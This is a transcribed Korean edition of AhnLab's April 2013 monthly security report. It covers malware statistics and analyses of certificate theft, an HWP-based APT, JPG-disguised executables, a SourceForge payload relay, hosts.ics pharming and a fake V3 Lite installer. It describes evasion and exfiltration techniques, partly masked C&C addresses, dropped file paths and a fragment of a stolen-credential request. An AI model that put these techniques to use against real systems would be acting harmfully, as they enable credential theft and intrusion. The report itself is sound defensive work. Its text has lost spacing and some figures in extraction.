CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안
|
|
- 호재 학
- 6 years ago
- Views:
Transcription
1 ASEC REPORT VOL 안랩월간보안보고서 2013 년 4 월보안동향
2 CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴 ( 에서확인하실수있습니다 년 4 월보안동향 악성코드동향 01. 악성코드통계 03-4월악성코드, 전월대비 217만여건감소 - 악성코드대표진단명감염보고최다 20-4월최다신종악성코드온라인게임핵 - 4월악성코드유형트로이목마가최다 - 악성코드유형별감염보고전월비교 - 신종악성코드유형별분포 02. 악성코드이슈 07 - 공인인증서탈취악성코드기승, 주의 - 한글문서취약점을이용한 APT 공격 - 원본파일의정체를숨긴그림파일주의 - 악성코드경유지로이용된 Sourceforge.net - 보스턴마라톤테러동영상메일로위장한악성코드 - hosts.ics를이용한파밍사이트접속유도 - 북핵관련문서파일로위장한악성코드 - PUP 이용한온라인게임핵유포 백신위장한 PUP 설치까지 - 인기게임에숨어든 좀비 PC 만드는악성코드 - 구인정보메일에숨어유포된악성코드 - 세계적인물류업체 DHL로위장한스팸메일 - HSBC 은행위장스팸메일 - 출장보고서문서파일로위장한악성코드 - 메일에첨부된악성 HWP 보안동향 01. 보안통계 24-4월마이크로소프트보안업데이트현황 02. 보안이슈 25 - Internet Explorer 제로데이취약점 (CVE ) - 사용자 PC를제어하는악성원격관리프로그램주의웹보안동향 01. 웹보안통계 27 - 웹사이트악성코드동향 - 월별악성코드배포 URL 차단건수 - 월별악성코드유형 - 월별악성코드가발견된도메인 - 월별악성코드가발견된 URL - 악성코드유형별배포수 - 악성코드배포순위 02. 웹보안이슈 30 - 언론사사이트를통한악성코드유포 - 취업포털사이트를통한악성코드유포 03. 모바일악성코드이슈 22 - 스마트폰사용자의공인인증서를탈취하는악성앱발견
3 3 01 악성코드동향 악성코드통계 4월악성코드, 전월대비 217만여건감소 15,000,000 ASEC이집계한바에따르면, 2013 년 4월에감염이보고된악성코드는 550만 8895건인것으로나타났다. 이는전월 768만 5579건에비 10,000,000 5,000,000 6,708, % +976,749 7,685, % -2,176,684 5,508, % 해 217만 6684건이감소한수치다 ([ 그림 1-1]). 이중에서가장많이보고된악성코드는 Win-Trojan/ Onlinegamehack140.Gen이었으며, ASD.PREVENTION과 Textimage/ Autorun가다음으로많았다. 또한총 7건의악성코드가최다 20건목록에새로이름을올렸다 ([ 표 1-1]) 그림 1-1 월별악성코드감염보고건수변화추이 순위 등락 악성코드명 건수 비율 1 Win-Trojan/Onlinegamehack140.Gen 238, % 2 ASD.PREVENTION 200, % 3 2 Textimage/Autorun 175, % 4 Trojan/Win32.urelas 140, % 5 1 Trojan/Win32.onlinegamehack 109, % 6 6 Malware/Win32.generic 101, % 7 4 Adware/Win32.winagir 85, % 8 1 Trojan/Win32.adh 77, % 9 1 Trojan/Win32.Gen 71, % 10 1 Malware/Win32.suspicious 71, % 11 NEW Win-Trojan/Wgames.Gen 69, % 12 2 RIPPER 65, % 13 NEW Win-Trojan/Asd.variant 61, % 14 6 Trojan/Win32.scar 59, % 15 NEW Win-Trojan/Onlinegamehack , % 16 NEW Als/Bursted 56, % 17 NEW Win-Trojan/Avkiller4.Gen 53, % 18 5 Trojan/Win32.agent 43, % 19 NEW Win32/Autorun.worm F 43, % 20 NEW Win32/Virut.f 32, % TOTAL 1,816, % 표 년 4월악성코드최다 20건 ( 감염보고, 악성코드명기준 )
4 4 악성코드대표진단명감염보고최다 20 [ 표 1-2] 는악성코드별변종을종합한악성코드대표진단명중가장많이보고된 20건을추린것이다. 이중 Trojan/Win32가총 77만 5707건으로가장빈번히보고된것으로조사됐으며 Win-Trojan/Onlinegamehack 이 45만 4205건, Win-Trojan/Agent 가 32만 6467건으로그뒤를이었다. 순위 등락 악성코드명 건수 비율 1 Trojan/Win32 775, % 2 Win-Trojan/Onlinegamehack 454, % 3 Win-Trojan/Agent 326, % 4 1 Win-Trojan/Onlinegamehack , % 5 1 Adware/Win32 206, % 6 ASD 200, % 7 Malware/Win32 183, % 8 2 Textimage/Autorun 175, % 9 1 Win-Trojan/Downloader 175, % 10 6 Win32/Conficker 91, % 11 3 Win32/Virut 83, % 12 7 Win32/Autorun.worm 78, % 13 NEW Backdoor/Win32 72, % 14 NEW Win-Trojan/Wgames 69, % 15 3 Win-Trojan/Avkiller 69, % 16 4 Win32/Kido 68, % 17 NEW RIPPER 65, % 18 9 Win-Adware/Korad 64, % 19 4 Downloader/Win32 64, % 20 NEW Win-Trojan/Asd 61, % TOTAL 3,524, % 표 1-2 악성코드대표진단명최다 20건 4월최다신종악성코드온라인게임핵 [ 표 1-3] 은 4월에신규로접수된악성코드중감염보고가가장많았던 20건을꼽은것이다. 4월의신종악성코드는온라인게임핵 (Win- Trojan/Onlinegamehack ) 이 5만 9504건으로전체의 18.1% 를차지했다. 애드웨어 (Win-Adware/ Shortcut ) 는 2만 6568건이보고돼 8.1% 의비율을보였다. 순위 악성코드명 건수 비율 1 Win-Trojan/Onlinegamehack , % 2 Win-Adware/Shortcut , % 3 Win-Trojan/Onlinegamehack , % 4 Win-Trojan/Downloader E 25, % 5 Win-Trojan/Systemhijack , % 6 Win-Spyware/Pbot , % 7 Win-Trojan/Agent , % 8 Win-Trojan/Avkiller , % 9 Win-Trojan/Onlinegamehack AE 14, % 10 Win-Trojan/Onlinegamehack O 13, % 11 Win-Trojan/Onlinegamehack G 12, % 12 Win-Trojan/Egapel , % 13 Win-Trojan/Agent WB 11, % 14 Win-Adware/NATService , % 15 Win-Trojan/Onlinegamehack AF 8, % 16 Win-Trojan/Onlinegamehack , % 17 Win-Trojan/Onlinegamehack H 8, % 18 Win-Trojan/Killav , % 19 Win-Trojan/Onlinegamehack D 7, % 20 Win-Adware/KorAd , % TOTAL 328, % 표 1-3 4월신종악성코드최다 20건
5 5 4월악성코드유형트로이목마가최다 [ 그림 1-2] 는 2013년 4월 1개월간안랩고객으로부터감염이보고된악성코드의유형별비율을집계한결과다. 트로이목마 (Trojan) 가 57.2% 로가장높은비율을나타냈고애드웨어 (Adware) 와웜 (Worm) 이각각 6.5% 의비율을차지했다. 그림 1-2 악성코드유형별비율 악성코드유형별감염보고전월비교 [ 그림 1-3] 은악성코드유형별감염비율을전월과비교한것이다. 트로이목마, 애드웨어, 웜, 바이러스, 다운로드, 스파이웨어등은전월에비해증가세를보였으며, 스크립트, 드롭퍼는감소했다. 그림 년 3 월 vs 년 4 월악성코드유형별비율
6 6 신종악성코드유형별분포 4월의신종악성코드를유형별로살펴보면트로이목마가 80% 로가장많았고, 애드웨어가 13%, 스파이웨어가 4% 로각각집계됐다. 그림 1-4 신종악성코드유형별분포
7 7 02 악성코드동향 악성코드이슈 공인인증서탈취악성코드기승, 주의공인인증서를탈취하는악성코드가또다시발견돼사용자의주의가요구된다. 이악성코드는취약점을이용해드라이브바이다운로드방식으로악성코드를유포한뒤, 감염된시스템에서공인인증서를수집해 FTP를통해전송한다. 악성코드제작자가악성코드유포를위해마련한사이트에접속하면 [ 그림 1-5] 와같은악성스크립트가동작하게된다. 사용하는브라우저의종류와 Java( 자바 ) 사용여부를체크한뒤, 악성스크립트가동작한다. [ 그림 1-7] 과같이공인인증서탈취를위해제작된 전자서명작성 창은실제금융기관에서사용하는것과매우유사하게만들어져일반인이쉽게눈치채기어렵다. 하지만자세히살펴보면미묘한차이점이있다. 패스워드를탈취하기위한공인인증서창은입력을받는부분이하나더존재하고, 커서 (Cursor) 두개가동시에깜빡이는것을확인할수있다. 그림 1-7 정상공인인증서 ( 왼쪽 ), 비정상공인인증서 ( 오른쪽 ) 그림 1-5 악성스크립트코드 탈취된공인인증서패스워드는시스템에서수집한맥주소와함께미국로스앤젤레스 (LA) 부근에위치한원격시스템으로전송된다. 악성코드에감염되면공인인증서창의클래스명인 QWidget 을감시한다. 만약공인인증서가실행이되면 GetWindowTextW 를이용해서입력된공인인증서패스워드의탈취를시도한다. 그림 1-8 맥주소탈취하는코드 그림 1-9 원격시스템으로공인인증서패스워드를전송하는코드 해당악성코드는감염된시스템에서공인인증서가있는지검색을하기도한다. 그림 1-6 공인인증서탈취코드 그림 1-10 공인인증서구성파일
8 8 [ 그림 1-14] 의 HWP 파일의문서정보를살펴보면작성자이름은 baidu1 으로중국포털사이트의이름이었다. 문서내용은 4월 11 일에최종수정된것으로보아 APT 공격을위해최근제작된것으로추정된다. 그림 1-11 공인인증서를검색하는코드 검색된공인인증서가있으면 FTP를통해원격시스템으로전송하고감염자의맥주소로서버에폴더를생성한다. [ 그림 1-12] 는실제해당 FTP 서버로접속해지금까지수집된공인인증서리스트다. 그림 1-14 HWP 문서정보 분석당시취약점이있는한글문서는보안패치가되지않은 2007버전에서실행할경우취약점이동작하는것으로확인됐다. 그림 1-12 공인인증서를수집하는원격시스템 그림 1-15 파일구성도 V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Trojan/Win32.Dloader ( ) 한글문서취약점을이용한 APT 공격최근국내에서특정기관을타깃으로한수상한한글문서가이메일로첨부돼유포되고있다는보고가접수됐다. 특정기관을타깃으로정보유출을시도하는전형적인지능형지속보안위협 (APT, Advanced Persistent Threat) 공격이었다. 이메일로유포된취약점이있는한글문서는 한국의대응전략.hwp 파일로, 외교안보연구원이 2012년 국제정세전망 에서밝힌북한의핵개발실험에대한전망과 6 자회담재개가능성및회담의효용성등에관한내용이담겨있다. 생성된파일을확인해보면 [ 그림 1-15] 와같이취약점에의해생성된 SVCH0ST.exe 파일이 ppst.temp, hwp.exe, 한국의대응전략.hwp 파일을생성하고 hwp.exe 파일이 mscmos.sys, linkinfo.dll, KB exe 파일을생성하는것을볼수있다. ppst.temp 파일은 SVCH0ST.exe 파일과동일하고, KB exe 파일은 hwp.exe 파일과동일하다. SVCH0ST.exe 파일에의해생성된한국의대응전략.hwp 파일은위 [ 그림 1-13] 과같은정상한글파일이다. mscmos.sys 파일은인코딩된것으로보이는데이터파일로추정되며, linkinfo.dll 파일은정상윈도우파일로가장한것으로보인다. 정상 linkinfo.dll 파일은윈도우시스템폴더 (%Systemroot%\system32) 에위치하는반면, hwp.exe 파일에생성된 linkinfo.dll 파일은윈도우폴더 (%Systemroot%) 에생성된다. 이는시스템시작시자동실행을위해레지스트리에등록하지않고도윈도우셸 (Shell) 이로딩되면서자동으로실행되도록하기위한것으로보인다. 그림 1-16 linkinfo.dll 파일비교 ( 왼쪽 : 정상, 오른쪽 : 악성 ) 그림 1-13 HWP 문서내용 [ 그림 1-16] 에서보이는것처럼정상 linkinfo.dll 파일과다르게악
9 9 성 linkinfo.dll 파일은원본파일이름이다르다. linkinfo.dll 파일은 explorer.exe 프로세스에인젝션돼실행되면서아래와같은 C&C 서버에주기적으로접속을시도한다. C&C 서버 : 59.1**.2**.4*: 88 V3 제품에서는아래와같이진단이가능하다. 본파일은진단하지않고있었다. 최근국내에서유포된게임핵변형중에도이와비슷한형태로실행파일이아닌것처럼위장한형태가발견됐다. 이악성코드는 [ 그림 1-18] 에서보는것과같이실행파일상단에그림파일인것처럼 JPG 파일헤더를추가함으로써보안제품에서탐지하지못하도록위장하고있다. <V3 제품군의진단명 > HWP/Agent ( ) Win-Trojan/Agent CA ( ) Win-Trojan/Agent FB ( ) Win-Trojan/Agent ( ) 원본파일의정체를숨긴그림파일주의악성코드제작자는악성코드가보안제품에탐지되거나 PC 사용자에게발견되는것을우회하기위해다양한시도를하고있다. 실행압축프로그램을이용해원본파일의정보를쉽게알수없도록하거나, 파일의확장자를 jpg와같은다른포맷의파일형식으로변경해실행파일이아닌것처럼위장하는것이대표적이다. 최근에는다른형태의파일내부에악성코드파일을저장해놓는등의방식으로보안관리자와보안장비를회피하려는시도도계속되고있다. [ 그림 1-17] 은최근해외에서보고된트위터를이용한타깃공격에사용된악성코드다. 그림 1-18 jpg 헤더가추가된악성파일실제악성파일의헤더가시작되는앞단의데이터를제거하면악성코드가동작하는데이악성코드는최근유행하는온라인게임의변종으로아래와같이다양한루트킷을설치하고윈도우실행파일을악성으로변조하며사용자계정정보를탈취한다. - C:\WINDOWS\SYSTEM32\drivers\xpV3001.sys - C:\WINDOWS\SYSTEM32\drivers\420a0a1f.sys - C:\WINDOWS\SYSTEM32\ws2help.dll 대부분의악성코드유포지는정상적인서비스를제공하는서버를해킹해서악의적인용도로사용하는경우가많기때문에잔존주기가길지않다. 하지만이번사례와같이데이터가변경된경우에는서버를관리하는관리자의입장에서도그림파일로오해해악성으로인지하지못할가능성이있어상대적으로오랜시간동안악성코드를유포할수있었다. 앞서소개한타깃공격에이용된관련악성코드의경우지난 2월경발견돼대부분의백신제품에서진단을하고있지만현재까지도웹사이트에서 swf 파일로위장한악성코드를유포하고있다. 그림 1-17 swf파일에저장된악성파일플래시파일로제작됐지만보안취약점이있는 PC의사용자가트위터에등록된 URL을클릭하면 CVE 취약점을이용한공격을수행해 swf 파일내부의악성코드를실행, 시스템을감염시킨다. swf 파일에는 32비트와 64비트 OS용으로제작된두개의악성코드가저장돼있는데흥미로운것은두파일모두파일헤더에불필요한문자를추가해실행파일이아닌것처럼위장해탐지를회피하려는제작자의치밀함을엿볼수있다는점이다. 변조된헤더를조작해정상실행파일로변경한악성코드를바이러스토탈 (Virustotal) 사이트에서검사해본결과, 절반이상의제품들이악성으로진단했으나변조된원 이러한상황은온라인게임핵의경우에도크게다르지않다. 일반적인실행파일의형태로유포되는악성코드가국내사이트에서유포되는경우, 대부분 1 2일안에제거되거나실행파일이제작자에의해지속적으로변경되는경우가대부분이지만위장된형태의악성코드는상대적으로오랜기간동안유지되고있다. 공격자의입장에서공격을유발하는파일을공격대상시스템에안전하게저장하고지속적으로유포할수있는가능성을높이는것은매우고무적인일이다. 악성코드로변환할수있는원본이탐지되지않고오래남아있으면실제로실행되는악성파일이탐지되더라도부팅등과같은특별한이벤트가발생할때지속적으로원본파일을활용해감염시킬수도있고, 사용자가위장된파일안에숨어있는원본파
10 10 일의존재를확인하는것도상대적으로어려워해커가오랜기간동안시스템을장악할수있기때문이다. 이와같이다른형태의파일로위장한악성코드는백신제품이나네트워크보안제품들이악성으로인지하지못하는경우가많아해킹된서버나공격을시도하는대상시스템에안전하게저장돼오랜기간동안사용되며이로인해지속적인피해를유발할가능성이높으므로주의가필요하다. notice.html이실행됨으로써생성된실행파일의내부코드를살펴보면 [ 그림 1-21] 과같이암호화된것으로추정되는문자열들이존재하며, 해당코드들은복호화루틴을거쳐서복호화된다. 해당악성코드는 V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > SWF/Cve ( ) Win-Trojan/Boda ( ) Trojan/OnlineGamehack ( ) Win-Trojan/Agent TV ( ) 악성코드경유지로이용된 Sourceforge.net 그림 1-21 복호화루틴ㆍ암호화된문자열 -> 복호화된문자열 " " -> InternetReadFile() " " -> sourceforge.net/users/******world ㆍ참고사이트 : 그러나간혹악의적인사용자가 이번에발견한사례는국내게임과관련해언론사사이트를경유해유포된악성코드를조사하는과정에서 sourceforge.net에등록된특정계정이악성코드경유지로사용됐음을확인한것이다. 해당악성코드는해킹된게임관련언론사사이트에접속한 PC에 notice.html을다운로드하도록돼있다. 사용자의 PC에자바취약점 (CVE ) 이존재하면 notice.html이동작해내부에포함된실행파일을로컬 PC에생성한다. 그림 [ 그림 1-22] 처럼계정만생성된상태였다. 악성코드를좀더분석해보면 [ 그림 1-23] 처럼메모리에저장한다. 그림 1-23 메모리에저장된웹페이지 그림 1-19 notice.html 다운로드위 [ 그림 1-19] 에서보는코드에의해서로컬 PC에다운로드된 notice.html은취약점을가진 applet.jar(cve ) 와 HEX 데이터로구성된실행파일을실행하도록돼있다. 그림 1-20 notice.html에포함된실행파일 악성코드는메모리에저장된웹페이지에서 <title>sourceforge.net: rrryvkmdghpndxyxjhxsybda - User Profile</title> 을추출해복호화한다. 붉은색으로표시된부분을복호화해보면 x.gif임을확인할수있다. 지금까지내용을정리해보면 notice.html에의해생성된악성코드가실행된뒤접속한 [ 그림 1-22] 의사이트는추가로악성코드를다운로드하기위한주소를 <title> 태그에암호화시켜놨고그암호화된 URL부분을추출및복호화한뒤추가로악성코드 (x.gif) 를다운로드한다. 다운로드된 x.gif 역시암호화돼있으나복호화해보면 [ 그림 1-24] 처
11 11 럼실행가능한파일임을알수있다. 그림 1-24 복호화된 x.gif 복호화된 x.gif는정상시스템파일을교체하는기능과특정온라인게임사용자의계정정보를탈취할목적을가지고있다. 아래예시는감염된 PC에서특정온라인게임사이트에로그인했을때악의적인사이트로탈취한계정정보를전송하는예다. AIMA&bm2=NAIMA&bm3=test &bm4=test &bm9=&bm 6=&bm10=&bm11=0&bm5=&bm7=&px1=&px2=" V3 제품에서는아래와같이진단이가능하다. 그림 1-26 악성코드유포페이지해당웹페이지에는일정시간이지나면특정파일 (boston. avi.exe) 을다운로드하도록 meta 태그가삽입돼있으며, 자바취약점을이용해악성코드가유포되도록 iframe도삽입돼있다. <V3 제품군의진단명 > Win-Trojan/Onlinegamehack BD ( ) Win-Trojan/Onlinegamehack ( ) Win-Trojan/Onlinegamehack ( ) 보스턴마라톤테러동영상메일로위장한악성코드 최근미국보스턴 (Boston) 마라톤대회에서발생한테러관련스팸메일을이용해악성코드가유포돼사용자들의주의가요구된다. 이번에발견된스팸메일은 Aftermath to explosion at Boston Marathon 이란제목으로발송됐으며, 본문에는 [ 그림 1-25] 와같은링크가첨부돼있었다. 그림 1-27 웹페이지에삽입된 iframe 사용자가악성코드 (temp16.exe) 에감염되면, [ 그림 1-28] 과같이스팸메일이무작위로발송된다. 그림 1-25 보스턴마라톤테러관련스팸메일 그림 1-28 temp16.exe 악성코드 사용자가메일에첨부된링크를클릭하면보스턴마라톤테러동영상을보여주는웹페이지로연결된다. 이와유사한형태의악성 URL이다수발견되고있으므로, 발신인이명확하지않거나의심스러운링크가포함된메일을확인할때에는각별한주의가필요하다.
12 12 하지만최근파밍사이트로접속을시도하는피해시스템들을확인한결과, DNS IP의변경이나 hosts 파일의변조가일어나지않은상태에서도공격자가만들어놓은가짜사이트로접속을시도하는사례가확인됐다. 우리가원하는웹사이트를찾아갈때, 사용자는웹브라우저에해당웹사이트의 URL정보를입력하는데웹브라우저가이 URL 정보를확인하고해당웹사이트를직접찾아가는것이아니라 DNS를통해해당웹서버의 IP를확인해서연결해주는것이다. 웹사이트를찾아갈때, 참조하는정보와우선순위를살펴보면아래와같다. 그림 1-29 악성 URL 정보 V3 제품에서는아래와같이진단이가능하다. 1 로컬시스템의 DNS Cache 정보 2 hosts.ics 3 hosts 4 DNS <V3 제품군의진단명 > Trojan/Win32.Foreign ( ) Trojan/Win32.Agent ( ) Backdoor/Win32.Simda ( ) hosts.ics를이용한파밍사이트접속유도인터넷사용이일반화되면서인터넷뱅킹을통해은행을직접가지않아도책상앞에서손쉽게온라인송금을하거나, 온라인쇼핑몰을통해손쉽게물건을구매할수있는편리한세상이됐다. 그러나이러한기술발전의이면에는조그만부주의가큰손실을가져오기도한다. 최근올바른홈페이지주소를입력해도가짜홈페이지로유도돼개인의금융거래정보를탈취하는파밍사고가지속적으로발생하고있다. 이에파밍기법에대해알아보고, 예방법을공유하고자한다. 일반적으로악성코드제작자들은사용자들의금융정보를가로채기위해사용자의 hosts 파일을변경하거나, 공격자가만들어놓은서버 IP 를사용자 DNS 서버 IP로변경해정상적인금융권사이트에접속해도공격자가만들어놓은가짜사이트에접속되도록만든다. 그러나이같은방법은이미일반화된공격방법이어서, 대부분의보안프로그램들은사용자시스템의 hosts파일을모니터링해변경사실을사용자에게알리거나변경자체를방어하기도한다. 여기서 hosts.ics 파일은일반적으로사용하지않는인터넷연결공유 (ICS: Internet Connection Sharing) 시특정클라이언트의 IP를강제로지정하는기능을하는파일이다. 위순서와같이 hosts.ics 파일이존재하지않을경우, hosts 파일을참조하게되지만, 악성코드제작자입장에서는각종보안프로그램들이주시하고있는 hosts 파일을굳이변경하지않더라도우선순위가높은 hosts.ics 파일을변경, 생성하면원하는파밍사이트로의유도가얼마든지가능하다는것이확인됐다. 최초유포지는지속적으로변경되고있지만, 수집되는악성파일들을분석한결과변조된업데이트파일들이아래경로의악성코드를다운로드하여동작한다는사실을확인했다. 위악성파일이다운로드되면 C:\Windows\Tasks 폴더에 conime. exe 파일을생성하게되고, 이악성코드가서비스에자신을등록한뒤외부서버로부터파밍에이용될사이트정보를지속적으로참조한다. 그림 1-30 파밍사이트화면 그림 1-31 지속적으로갱신되는파밍사이트
13 13 을입력할경우, 입력값을검증해정해진형식과일치하지않으면 [ 그림 1-36] 과같이에러메시지가뜬다. 이러한사실로보아최근발견되는대부분의피싱및파밍사이트들은입력되는값들을무조건수집하는게아니라, 필터링을통해의미있는데이터들을수집한다는것을알수있다. 그림 1-32 악성코드주요기능 이과정에서해당악성코드는아래경로에 hosts.ics 파일을생성하고, 지속적으로모니터링하며파밍사이트를갱신한다. 그림 1-36 입력되는값이형식과맞지않을때의에러화면 그림 1-33 파밍사이트유도를위한 hosts.ics 생성 hosts.ics 파일의우선순위로인해악성코드에감염되면사용자들은정상적인금융권사이트의주소를입력해도 [ 그림 1-34] 와같은악성코드제작자가만들어놓은파밍사이트로접속을하게된다. 파밍사이트에서는어떤메뉴를선택해도 전자금융사기예방시스템 신청을위한개인정보입력화면으로이동한다. 최근확인된온라인게임핵이나파밍관련악성코드들은대부분 PUP( 불필요프로그램 ) 의업데이트파일변조를통해유포되는것으로확인됐다. 이에사용자들이웹사이트방문시설치되는액티브 X(ActiveX) 와파일공유 (P2P) 프로그램의설치시더욱세심한주의를기울여야한다. V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > BinImage/Ghost ( ) Trojan/Win32.Qhost ( ) 북핵관련문서파일로위장한악성코드 그림 1-34 개인정보입력을유도하는파밍사이트 최근북한과의군사적긴장관계를악용하는악성코드가발견됐다. 발견당시남북한은개성공단폐쇄및북한의미사일발사위협등으로군사적긴장감이상당히높았다. 이런분위기탓에해당파일을실행해악성코드에감염되는사용자가많을것으로보이므로사용자의각별한주의가요구된다. 그림 1-35 개인정보입력을유도하는파밍사이트 개인정보입력란에 [ 그림 1-35] 와같이정확하지않은값 ( 쓰레기값 ) 그림 1-37 MS 워드파일로위장한악성코드
14 14 이번에발견된악성코드는위와같이 차북핵한국대응조치결과가나왓어요.exe 라는파일명을사용하고있다. MS워드문서파일형식의아이콘을그대로사용하고있지만, 실제파일형식은 exe 실행파일이다. 접속을시도하는 IP 주소가이전에 출장보고서문서파일로위장악성코드 편에서다뤘던 IP 주소와동일한것으로보아동일조직에서제작한악성코드로추측된다. 해당 IP 주소에해당하는서버는중국에위치하고있다. 악성코드는 RAR 실행압축파일로제작돼있으며, 해당파일을실행하면 12.hwp 한글문서파일과다수의 PE 파일을생성하는데그목록은다음과같다. < 악성코드실행시생성되는 PE파일목록 > - C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gm.exe - C:\WINDOWS\system32\SVKP.sys - C:\Documents and Settings\All Users\SysEV\rc.hlp - C:\Documents and Settings\All Users\SysEV\rc.exe - C:\Documents and Settings\All Users\SysEV\rcdll.dll 해당악성코드를실행하면생성되는 12.hwp 파일은자동으로한글프로그램을통해열리기때문에사용자는정상파일이실행된것으로생각하기쉽다. 그러나이것은사용자의눈을속이기위한동작으로, 백그라운드에서는악성코드의감염이진행되고있다. 그림 1-41 네트워크연결정보 V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Dropper/Win32.Agent ( ) BinImage/Plugx ( ) Win-Trojan/Inject.4096.N ( ) 그림 hwp 문서가자동으로열린화면 이후악성코드는생성된 SVKP.sys 파일을 SVKP라는서비스명으로등록하고주기적으로동작한다. 조류독감안내문을위장한악성코드발견중국에서발생한신종조류독감 (H7N9) 이확산돼사회적으로이슈가되고있는최근 조류독감안내문 을위장한악성코드가발견돼사용자들의각별한주의가요구된다. 이번에발견된악성코드 ( 조류독감안내문.exe) 는이메일의첨부파일로유포되었을것으로추정되며, 정상적인 MS워드문서로위장하고있다. 그림 1-39 SVKP 라는이름으로서비스에등록된 SVKP.sys 파일 등록된악성서비스는 [ 그림 1-40] 과같이특정 IP로의연결을시도하지만, 현재는해당서버가동작하지않아이후과정을확인할수는없었다. 그림 1-42 조류독감안내문을위장한악성파일 해당파일을실행할경우사용자가악성코드에감염된것을인지할수없도록정상 ( 조류독감안내문.docx) 워드문서가실행된다. 그림 1-40 특정 IP 주소로접속을시도하는서비스프로세스
15 15 V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Win-Trojan/Agent ( ) Win-Trojan/Agent ( ) PUP 이용한온라인게임핵유포 백신위장한 PUP 설치까지 그림 1-43 조류독감안내문.exe 실행화면 최근온라인게임핵으로인한많은피해사례들이보고되고있는가운데, 지난달말에는무료화면복사프로그램인 안카메라 업데이트파일을통해온라인게임핵이유포되기도했다. 최근접수된악성코드감염형태를살펴볼때다수의시스템에 PUP 프로그램이설치돼있었다는점에서 PUP프로그램을통해온라인게임핵이유포되는것이아닌가하는의구심이제기됐다. 악성코드는다음과같은파일을생성하며, Temp 폴더에생성된 vm1ectmp.exe 파일은해당악성코드의복사본이다. 이번에소개하는이슈는실제온라인게임핵이 PUP 프로그램을통해유포되고있다는사실을확인해준사례로, 온라인게임핵의유포방식이나날이다양화해지고있음을방증한다. 그림 1-44 생성파일정보 또한 NEWCLIENT13.EXE 파일을통해 ODBC 폴더에 AppMgmt.dll 파일을생성한다. 많은사람들이무료프로그램이나특정툴을다운로드할때, 제작사의홈페이지를이용하는게아니라일반게시판이나블로그를통해서다운로드한다. 특히최근확인된악성코드유포블로그에서는개인에게무료로제공하는 V3 Lite의설치파일 (v3litesg_setup.exe) 로위장하는사례가발견돼사용자들의주의가요구된다. 해당블로그에서는 V3 Lite 설치와동시에다수의 PUP 프로그램을설치했으며, 이중특정 PUP 프로그램이온라인게임핵을다운로드해설치하는방식을사용했다. 그림 1-45 AppMgmt.dll 파일 - 유포블로그 : hxxp://blog.d***.net/je**o*n9**98/*8 AppMgmt.dll 파일은윈도우서비스 (Application Management) 에등록돼동작하도록구성되어있다. 그림 1-46 서비스등록정보 해당악성코드는시스템정보등을탈취하는데이용될것으로추정되며특정서버 (59.X.X.203) 로접근을시도하나분석시점에는연결되지않았다. 그림 1-47 네트워크연결정보 그림 1-48 악성파일유포블로그에게시된 V3 Lite 로위장한허위파일
16 16 V3 설치파일로위장한해당설치파일을다운로드한후해당파일의속성을살펴보면안랩홈페이지 ( 에서배포하는 V3 Lite의설치버전과다름을알수있다. 그림 1-52 PUP 프로그램과함께설치되는온라인게임핵 그림 1-49 V3 Lite 설치파일비교 ( 왼쪽 : 악성 / 오른쪽 : 정상 ) 블로그에서해당파일을다운로드받아설치를진행하면 [ 그림 1-50] 과다수의제휴프로그램들의설치에대해사용자동의를받는다. 동의를하지않을경우설치가진행되지않아, 사용자의설치를강요한다. 그림 1-53 감염시스템의 MAC, OS, 백신프로그램체크 그림 1-50 PUP 설치를위한사용자동의사용자가이용약관에동의하고설치를진행할경우 V3 Lite 프로그램이정상적으로설치되긴하지만, V3 Lite 설치와동시에바탕화면에여러 P2P 사이트와쇼핑몰사이트의바로가기아이콘이생성되고허위백신프로그램이설치된다. 설치파일실행시다수의 PUP 프로그램이설치되는데, 바탕화면에 P2P 사이트나온라인쇼핑몰바로가기아이콘들이생성되고, 수시로광고웹페이지가열리며, 아래와같이존재하지않는위협요소를띄워서사용자의공포심을유발, 결제를유도하는허위백신프로그램도함께설치된다. 해당온라인게임핵은설치되는과정에서 [ 그림 1-53] 과같이특정서버로사용시스템의 MAN 정보, OS 정보, 백신프로그램의정보가체크되는것이확인됐다. 최근온라인게임핵에서자주등장하는 ws2help.dll 정상파일바꿔치기와백신프로그램을무력화하는기능은동일하게나타났다. 이글을작성하는시점에해당블로그에링크된 V3 Lite 설치파일을다운로드해설치할경우여전히다수의 PUP 프로그램들이설치되지만, 온라인게임핵을설치하는 wuu_utiltop.exe 파일은변경되어설치를진행해도더이상의온라인게임핵은자동으로설치되지않았다. 하지만지금이시점에도온라인게임핵을배포하는해당웹사이트는여전히운영되고있으며해당경로를통해다운로드가가능하다. 이와같은피해사례를사전에예방하기위해서는정상적인프로그램이나툴들은해당프로그램제작사홈페이지나공식적인다운로드사이트를통해서내려받는것이좋고, 블로그를통해다운로드받은파일들은공신력있는백신프로그램을이용해사전에검사를진행한후사용하는것이안전하다. 그림 1-51 V3 Lite 와함께설치되는 PUP 프로그램 이중 윈도우유틸리티업데이트 (wuu_utiltop.exe) 가온라인게임핵을다운로드한후실행된다. 여기서 PUP 프로그램이란, 불필요한프로그램 (PUP : Potentially Unwanted Program) 으로사용자가설치에동의했지만프로그램의실제내용이설치목적과관련이없거나불필요한프로그램으로시스템에문제를일으키거나사용자에게불편을초래할잠재적위험이있다. 안랩은허위사실이나과장된결과로수익을얻는경우나프로그램제작사또는배포지가불분명한경우등대다수사용자가불편을호소한프로그램을 PUP 프로그램으로진단하며, 사용자의동의하에 PUP 프
